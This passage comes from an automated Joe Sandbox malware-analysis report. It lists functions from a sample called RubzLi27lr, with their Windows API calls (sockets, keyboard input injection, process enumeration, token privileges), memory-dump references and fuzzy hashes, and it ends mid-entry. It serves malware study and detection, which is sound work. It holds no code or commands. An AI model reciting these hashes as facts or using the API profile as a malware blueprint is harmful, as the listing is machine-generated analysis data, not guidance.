                                                                                                                  • GetWindowRect.USER32(017EE7A0,?), ref: 00B462E2
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B46315
                                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B46382
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3880355969-0
                                                                                                                  • Opcode ID: 45b8fef7e43787bdc926b0bfe897319e2788f2471306cbf9b7e058c055d2cebf
                                                                                                                  • Instruction ID: 96309c4ea415c42bd5f8db2db8cffda72e0119a1e13d735e97d8bc94bbe3806d
                                                                                                                  • Opcode Fuzzy Hash: 45b8fef7e43787bdc926b0bfe897319e2788f2471306cbf9b7e058c055d2cebf
                                                                                                                  • Instruction Fuzzy Hash: A9513C74A01249AFCF14DF68D8809AE7BF5FB46364F108599F8159B2A0D730EE41DB51
                                                                                                                  Function 00B31AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00B31AFD
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31B0B
                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B31B8A
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31B94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$socket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1881357543-0
                                                                                                                  • Opcode ID: 71c0d50beff4da0533ab93a564b5633cd3b41b8d2a3445daa2d7e5fb157e51b4
                                                                                                                  • Instruction ID: 052880c49774b8b51ac08faccfcf60b7fe4edf6487c7bd7aec7278276e07aff3
                                                                                                                  • Opcode Fuzzy Hash: 71c0d50beff4da0533ab93a564b5633cd3b41b8d2a3445daa2d7e5fb157e51b4
                                                                                                                  • Instruction Fuzzy Hash: CF41A234600200AFE720AF24C986F6A77E9EB44718F54849CF91A9F7D3E772DD418B91
                                                                                                                  Function 00AEB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 181df27bc4160b02e470e49f0944c29593792b53b011c08a7e9cbea9892d63f1
                                                                                                                  • Instruction ID: 911d1d48c22658c089ea3f4cd291731d2de98cd6108aebb59ac1b2e95f55872f
                                                                                                                  • Opcode Fuzzy Hash: 181df27bc4160b02e470e49f0944c29593792b53b011c08a7e9cbea9892d63f1
                                                                                                                  • Instruction Fuzzy Hash: 63412971A10344BFD7249F79CD45BABBBE9EB84710F10852EF512DB2C1D371990187A0
                                                                                                                  Function 00B256D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B25783
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00B257A9
                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B257CE
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B257FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321077145-0
                                                                                                                  • Opcode ID: 02204a356860b1a7bf7d916f1e98c89fb104eef4c0f13c5c0a851ff13463ad5b
                                                                                                                  • Instruction ID: aa3978bb65242331e8d623d5ec21fd1ca017bda87d40fa1ceaa3c045802027e1
                                                                                                                  • Opcode Fuzzy Hash: 02204a356860b1a7bf7d916f1e98c89fb104eef4c0f13c5c0a851ff13463ad5b
                                                                                                                  • Instruction Fuzzy Hash: 5E410B39600610DFCB21DF15C545A5EBBE6EF89720B19C488E84AAB362CB74FD40DB91
                                                                                                                  Function 00AED8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AD6D71,00000000,00000000,00AD82D9,?,00AD82D9,?,00000001,00AD6D71,8BE85006,00000001,00AD82D9,00AD82D9), ref: 00AED910
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AED999
                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AED9AB
                                                                                                                  • __freea.LIBCMT ref: 00AED9B4
                                                                                                                    • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2652629310-0
                                                                                                                  • Opcode ID: b7e67ba812ba5dc40cba14c5232180a77a174166b1a3c5278a43c5262f9281f8
                                                                                                                  • Instruction ID: a355525aec8c5ac5aef929398367436712c8bcd230ae6cc999399a9e9020060e
                                                                                                                  • Opcode Fuzzy Hash: b7e67ba812ba5dc40cba14c5232180a77a174166b1a3c5278a43c5262f9281f8
                                                                                                                  • Instruction Fuzzy Hash: D431CD72A0024AABDF24DF66DC45EAE7BA5EB41710F054169FC05DB252EB35CD50CBA0
                                                                                                                  Function 00B452C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00B45352
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B45375
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B45382
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B453A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3340791633-0
                                                                                                                  • Opcode ID: 45c0ee4b2ae6296d785ae000028ab9575cbc4bbb5fd5714dcaea63768ae413bb
                                                                                                                  • Instruction ID: f1384e16077f9cea2cf7d2424ac5e7e542c9c4d90066bc4a357efb5dee069b14
                                                                                                                  • Opcode Fuzzy Hash: 45c0ee4b2ae6296d785ae000028ab9575cbc4bbb5fd5714dcaea63768ae413bb
                                                                                                                  • Instruction Fuzzy Hash: EF316D35A56E0CAFEB309E14CC45BE977E5EB05390F584181BA12961E2C7B49F40FB4A
                                                                                                                  Function 00B1AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00B1ABF1
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B1AC0D
                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B1AC74
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00B1ACC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: f1e6f56a7eae088041729b9b5fcc732cc9366c6262924af0ca8686e5e99a6c1a
                                                                                                                  • Instruction ID: e685e1866c8a6cc13494457a1ac319144198de8dd8386f81628f31e1007b9aec
                                                                                                                  • Opcode Fuzzy Hash: f1e6f56a7eae088041729b9b5fcc732cc9366c6262924af0ca8686e5e99a6c1a
                                                                                                                  • Instruction Fuzzy Hash: 0B312630A01318AFEF35CB658C047FA7BE5EB89710F84429AE485932D1D375AAC587D2
                                                                                                                  Function 00B47674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B4769A
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B47710
                                                                                                                  • PtInRect.USER32(?,?,00B48B89), ref: 00B47720
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00B4778C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352109105-0
                                                                                                                  • Opcode ID: ddf66a236ea5ac8cc2b55501aec3c615f12e2f12d3659433d0dc23ec4a842170
                                                                                                                  • Instruction ID: c12b53241ea99846778e2cf82bb2e1cd2abb0f698267ac833abec89fd78cec62
                                                                                                                  • Opcode Fuzzy Hash: ddf66a236ea5ac8cc2b55501aec3c615f12e2f12d3659433d0dc23ec4a842170
                                                                                                                  • Instruction Fuzzy Hash: B9418D38646214DFCB12CF58C894EA97BF9FF49714F5584E8E4249B261CB30AE42DF90
                                                                                                                  Function 00B416DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 00B416EB
                                                                                                                    • Part of subcall function 00B13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B13A57
                                                                                                                    • Part of subcall function 00B13A3D: GetCurrentThreadId.KERNEL32 ref: 00B13A5E
                                                                                                                    • Part of subcall function 00B13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B125B3), ref: 00B13A65
                                                                                                                  • GetCaretPos.USER32(?), ref: 00B416FF
                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00B4174C
                                                                                                                  • GetForegroundWindow.USER32 ref: 00B41752
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759813231-0
                                                                                                                  • Opcode ID: 26786cdf143f8b560ef55ba453fae4ff9b0be13759ae166e238dc520c3be3b6b
                                                                                                                  • Instruction ID: de38a227eb9e4795ad5b8a48b36712d3475e5982b74760b35b0b544e80c83b7a
                                                                                                                  • Opcode Fuzzy Hash: 26786cdf143f8b560ef55ba453fae4ff9b0be13759ae166e238dc520c3be3b6b
                                                                                                                  • Instruction Fuzzy Hash: FB311075D00249AFC700EFA9C981DEEBBFDEF49304B5444A9E415E7212D6359E45CBA0
                                                                                                                  Function 00B1DF95 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                  • _wcslen.LIBCMT ref: 00B1DFCB
                                                                                                                  • _wcslen.LIBCMT ref: 00B1DFE2
                                                                                                                  • _wcslen.LIBCMT ref: 00B1E00D
                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B1E018
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3763101759-0
                                                                                                                  • Opcode ID: 2b1cd884d3a32ad6da4f28ccf47daa5da6d82f2f923e196d8819b15a9d004ff2
                                                                                                                  • Instruction ID: 1a8f25d091cdcd1bb9c5de6eaeb8d3344ec596c7d6e337bb622a6b804485f741
                                                                                                                  • Opcode Fuzzy Hash: 2b1cd884d3a32ad6da4f28ccf47daa5da6d82f2f923e196d8819b15a9d004ff2
                                                                                                                  • Instruction Fuzzy Hash: 6F21E575D00214AFCB10DFA8C982BAEB7F8EF49750F1440A5E815BB342D670DE41CBA1
                                                                                                                  Function 00B1D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B1D501
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B1D50F
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00B1D52F
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B1D5DC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 420147892-0
                                                                                                                  • Opcode ID: 768c830410df81ec89af1e01f627c65a312fbd5e3bcc40beb00fcfa7c753ffd0
                                                                                                                  • Instruction ID: 86924fc8e6f424492b644977e5d7d176ebf7c12efe695bc76af5c43383c3e074
                                                                                                                  • Opcode Fuzzy Hash: 768c830410df81ec89af1e01f627c65a312fbd5e3bcc40beb00fcfa7c753ffd0
                                                                                                                  • Instruction Fuzzy Hash: 9C318F711083009FD300EF54C885AEFBBE8EF9A354F54092DF585971A2EB719A85CB92
                                                                                                                  Function 00B48FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49001
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B07711,?,?,?,?,?), ref: 00B49016
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B4905E
                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B07711,?,?,?), ref: 00B49094
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2864067406-0
                                                                                                                  • Opcode ID: 001edfd6ae8fcaca020abfc2301dfd5a268d1961c3838ed410f1fabdd4e65a42
                                                                                                                  • Instruction ID: b368abf7d95338993d41a792df2ab669625c29f677fd9150ce6831b933e427aa
                                                                                                                  • Opcode Fuzzy Hash: 001edfd6ae8fcaca020abfc2301dfd5a268d1961c3838ed410f1fabdd4e65a42
                                                                                                                  • Instruction Fuzzy Hash: 0E21AD35601018AFDF25CF98C859EFB3BF9FB4A750F004099F90547261CB319A51EB60
                                                                                                                  Function 00B1D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNEL32(?,00B4CB68), ref: 00B1D2FB
                                                                                                                  • GetLastError.KERNEL32 ref: 00B1D30A
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B1D319
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B4CB68), ref: 00B1D376
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2267087916-0
                                                                                                                  • Opcode ID: 49bed3a02c24552d8762bc53d15d515192c23178faeb67e9838cc3b4309ec9fb
                                                                                                                  • Instruction ID: 8120eeb03bc17ebf36f3526bb2a6b7e545eb5d645d5737fa80499b06bfdedfd4
                                                                                                                  • Opcode Fuzzy Hash: 49bed3a02c24552d8762bc53d15d515192c23178faeb67e9838cc3b4309ec9fb
                                                                                                                  • Instruction Fuzzy Hash: 6521D3705052019F8700DF28D8814EB7BE8FE56724FA04A5DF4A9C32A2DB30DA86CB97
                                                                                                                  Function 00B11571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B11014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B1102A
                                                                                                                    • Part of subcall function 00B11014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B11036
                                                                                                                    • Part of subcall function 00B11014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11045
                                                                                                                    • Part of subcall function 00B11014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B1104C
                                                                                                                    • Part of subcall function 00B11014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11062
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B115BE
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00B115E1
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B11617
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B1161E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                  • String ID:
